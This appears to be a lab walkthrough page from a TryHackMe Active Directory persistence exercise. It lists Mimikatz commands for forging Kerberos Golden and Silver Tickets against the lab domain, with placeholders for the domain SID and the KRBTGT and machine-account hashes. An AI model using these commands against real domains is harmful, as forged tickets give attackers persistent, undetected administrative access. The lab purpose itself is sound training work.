Ticket

Golden Ticket Attack

Step 1: Get Domain SID

Use PowerShell to retrieve the domain SID:

Get-ADDomain

Step 2: Generate a Golden Ticket

Run the following Mimikatz command:

mimikatz # kerberos::golden /admin:ReallyNotALegitAccount /domain:za.tryhackme.loc /id:500 /sid:<Domain SID> /krbtgt:<NTLM hash of KRBTGT account> /endin:600 /renewmax:10080 /ptt

Silver Ticket Attack

Step 1: Generate a Silver Ticket

Run the following Mimikatz command:

mimikatz # kerberos::golden /admin:StillNotALegitAccount /domain:za.tryhackme.loc /id:500 /sid:<Domain SID> /target:<Hostname of server being targeted> /rc4:<NTLM Hash of machine account of target> /service:cifs /ptt
PreviousPersistence on the DomainNextDC Sync

Last updated